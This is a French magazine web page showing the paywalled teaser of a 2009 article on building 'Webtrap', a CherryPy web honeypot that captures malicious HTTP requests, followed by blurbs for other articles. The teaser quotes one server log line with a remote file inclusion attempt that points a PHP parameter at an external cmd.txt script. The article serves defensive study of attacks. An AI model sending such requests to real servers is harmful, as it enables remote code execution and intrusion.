Un web honeypot avec cherrypy

Magazine
Marque
GNU/Linux Magazine
Numéro
113
Mois de parution
février 2009


Résumé
Combien d’administrateurs système n'ont jamais vu leurs logs de serveur web polués par des requêtes HTTP moisies qui visent à exploiter des failles web sur des pages inexistantes ? Très peu, je pense. Cet article explique l'écriture d'un outil, appelé « web honeypot », qui va permettre de capturer toutes les requêtes invalides afin de les analyser et de répondre en conséquence. Ceci permettra de comprendre les intentions des pirates et, qui sait, peut-être de trouver des failles web encore méconnues du grand public (c'est beau de rêver).

69.9.37.130 - - [22/Feb/2008:00:44:05 +0100] "GET /index.php?x=http://www.hackergroup.altervista.org/cmd.txt?? HTTP/1.1" 200 2431

Cet article couvre l'écriture d'une application web, appelée « Webtrap » et écrite en Python. Cette application permet d'émuler d'autres applications web vulnérables afin de capturer toutes les tentatives d'attaques visant ces dernières. L'article commence par une présentation de Webtrap, introduit ensuite le framework de développement Cherrypy pour finir par décrire les étapes de l'écriture de Webtrap.

1. Présentation de Webtrap

1.1 Historique

La première version de Webtrap est née en 2006 lors d'un projet tuteuré de DUT [1]. Écrite en PHP, cette version avait pour but, à court terme, de récolter des statistiques sur les failles web les plus exploitées par les pirates et sur les sites vulnérables. À long terme, cette version a permis l'infiltration de quelques botnets [2] grâce aux scripts qui ont été récupérés.

1.2...

Cet article est réservé aux abonnés. Il vous reste 94% à découvrir.
S'abonner à Connect
  • Accédez à tous les contenus de Connect en illimité
  • Découvrez des listes de lecture et des contenus Premium
  • Consultez les nouveaux articles en avant-première
Je m'abonne


Article rédigé par

Par le(s) même(s) auteur(s)

Netusse, fuzzer de noyaux depuis 2006

Magazine
Marque
MISC
Numéro
64
Mois de parution
novembre 2012
Spécialité(s)
Résumé

Netusse est un fuzzer de sockets qui casse des noyaux depuis 2006. Cet exploit corner commence par décrire l'histoire et le fonctionnement interne de netusse puis présente quelques vulnérabilités intéressantes trouvées avec ce fuzzer et termine enfin par l'exploitation d'une de ces vulnérabilités sur OpenBSD.

OSSEC, un HIDS qui fait le café

Magazine
Marque
GNU/Linux Magazine
Numéro
128
Mois de parution
juin 2010
Résumé
Tripwire, AIDE, Samhain sont des noms dont vous avez déjà sûrement entendu parler. En effet, ceux sont les trois « Host based Intrusion Detection System » (HIDS) libres les plus répandus, qui sont mentionnés à chaque article traitant de sécurité. Le problème de ces trois HIDS est qu'ils se limitent uniquement à vérifier l'intégrité de certains fichiers de la machine qu'ils protègent et cela n'est bien évidemment pas suffisant. Ainsi, on retrouve généralement en plus de ces outils, des programmes comme rkhunter ou logcheck pour détecter la présence de rootkits sur le système et détecter des comportements étranges à travers l'analyse des logs, deux choses que ces trois HIDS ne sont pas capables de faire. Dans cet article, nous verrons qu'il existe un HIDS libre qui remplit toutes les fonctionnalités nécessaires pour protéger efficacement une ou un ensemble de machines. Cet HIDS se nomme OSSEC.

Les nouveautés de FreeBSD 8.0

Magazine
Marque
GNU/Linux Magazine
Numéro
121
Mois de parution
novembre 2009
Résumé
À l'heure où vous lisez ces lignes, des lutins plus ou moins verts traversent le world wide web pour transporter des morceaux de la dernière version stable du système d'exploitation à la bouboule rouge, j'ai nommé FreeBSD. En effet, actuellement en première release candidate depuis quelques semaines, la version 8.0 devrait pointer le bout de son nez dans peu de temps. Cette version apporte son gros lot de nouvelles fonctionnalités et de changements qui sont, pour les plus croustillants d'entres eux, décrits dans cet article.À l'instar de l'article publié à la suite de la sortie de la 7.0, cet article décrit les fonctionnalités les plus intéressantes qui ont été intégrées dans cette nouvelle version majeure de FreeBSD. L'article est découpé en parties qui présentent, chacune, les changements majeurs dans un domaine spécifique de FreeBSD.

Les derniers articles Premiums

Les derniers articles Premium

Les nouvelles menaces liées à l’intelligence artificielle

Magazine
Marque
Contenu Premium
Spécialité(s)
Résumé

Sommes-nous proches de la singularité technologique ? Peu probable. Même si l’intelligence artificielle a fait un bond ces dernières années (elle est étudiée depuis des dizaines d’années), nous sommes loin d’en perdre le contrôle. Et pourtant, une partie de l’utilisation de l’intelligence artificielle échappe aux analystes. Eh oui ! Comme tout système, elle est utilisée par des acteurs malveillants essayant d’en tirer profit pécuniairement. Cet article met en exergue quelques-unes des applications de l’intelligence artificielle par des acteurs malveillants et décrit succinctement comment parer à leurs attaques.

Migration d’une collection Ansible à l’aide de fqcn_migration

Magazine
Marque
Contenu Premium
Spécialité(s)
Résumé

Distribuer du contenu Ansible réutilisable (rôle, playbooks) par l’intermédiaire d’une collection est devenu le standard dans l’écosystème de l’outil d’automatisation. Pour éviter tout conflit de noms, ces collections sont caractérisées par un nom unique, formé d’une espace de nom, qui peut-être employé par plusieurs collections (tel qu'ansible ou community) et d’un nom plus spécifique à la fonction de la collection en elle-même. Cependant, il arrive parfois qu’il faille migrer une collection d’un espace de noms à un autre, par exemple une collection personnelle ou communautaire qui passe à un espace de noms plus connus ou certifiés. De même, le nom même de la collection peut être amené à changer, si elle dépasse son périmètre d’origine ou que le produit qu’elle concerne est lui-même renommé.

Mise en place d'Overleaf Community pour l’écriture collaborative au sein de votre équipe

Magazine
Marque
Contenu Premium
Spécialité(s)
Résumé

Si vous utilisez LaTeX pour vos documents, vous connaissez vraisemblablement Overleaf qui vous permet de rédiger de manière collaborative depuis n’importe quel poste informatique connecté à Internet. Cependant, la version gratuite en ligne souffre de quelques limitations et le stockage de vos projets est externalisé chez l’éditeur du logiciel. Si vous désirez maîtriser vos données et avoir une installation locale de ce bel outil, cet article est fait pour vous.

Abonnez-vous maintenant

et profitez de tous les contenus en illimité

Je découvre les offres

Déjà abonné ? Connectez-vous